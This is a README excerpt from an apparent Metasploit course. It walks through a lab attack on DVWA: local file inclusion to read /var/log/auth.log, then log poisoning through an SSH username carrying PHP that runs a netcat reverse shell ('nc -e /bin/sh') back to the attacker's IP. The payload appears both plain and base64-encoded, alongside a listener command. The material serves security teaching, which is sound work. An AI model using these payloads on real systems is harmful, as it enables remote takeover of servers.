jensendarren/metasploit-course/README.md

 Lets try and load a log file that shows login attempts to the server, which is the file `/var/log/auth.log`.
 So we change our url to be as follows: `http://10.0.2.4/dvwa/vulnerabilities/fi/?page=../../../../../var/log/auth.log`

+Since we are able to view the contents of the /var/log/auth.log file in the browser we can inject some php code there and then execute it!

+The way to do that is to check that if we attempt to ssh into the target server will that attempt show up in the output of /var/log/auth.log.
+If it does that means that we could potentially inject code into the server.

+Open a terminal session and start netcat listening on port 8888: `nc -vv -l -p 8888`

+In another terminal session, attempt to SSH into the target machine but this time set the user name to the php code we want to inject.
+Note that it's recommended to base64 encode the bash script.
+You can use Burp Suite to do that!

+SSH login command (before base64 encoding): `ssh "<?passthru('nc -e /bin/sh 10.0.2.15 8888');?>"@10.0.2.4`

+SSH login command (after base64 encoding): `ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxMC4wLjIuMTUgODg4OA=='));?>"@10.0.2.4`